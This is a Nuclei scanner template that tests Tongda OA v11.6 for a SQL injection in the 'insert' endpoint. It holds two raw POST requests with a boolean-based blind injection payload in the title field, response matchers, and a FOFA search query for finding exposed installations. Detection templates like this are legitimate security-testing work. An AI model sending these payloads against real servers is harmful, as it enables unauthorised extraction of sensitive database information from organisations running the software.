id: tongda-insert-sqli

info:
  name: Tongda OA v11.6 Insert Parameter - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: tongda2000
    product: office_anywhere
    fofa-query: app="TDXK-通达OA"
  tags: tongda,sqli,intrusive

http:
  - raw:
      - |
        POST /general/document/index.php/recv/register/insert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
      - |
        POST /general/document/index.php/recv/register/insert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "PHPSESSID="
          - "register_for/?rid="
        condition: and

      - type: word
        part: header_2
        words:
          - "register_for/?rid="
        negative: true
# digest: 490a0046304402201eb9aff3e9dbeedeabd249bd947f23dfeeb2800c10474f1ab608195057445eca02203e1dccb03dda47cd4181689138fb160810a667eda9e799d541e1c5e923277e29:922c64590222798bb761d5b6d8e72950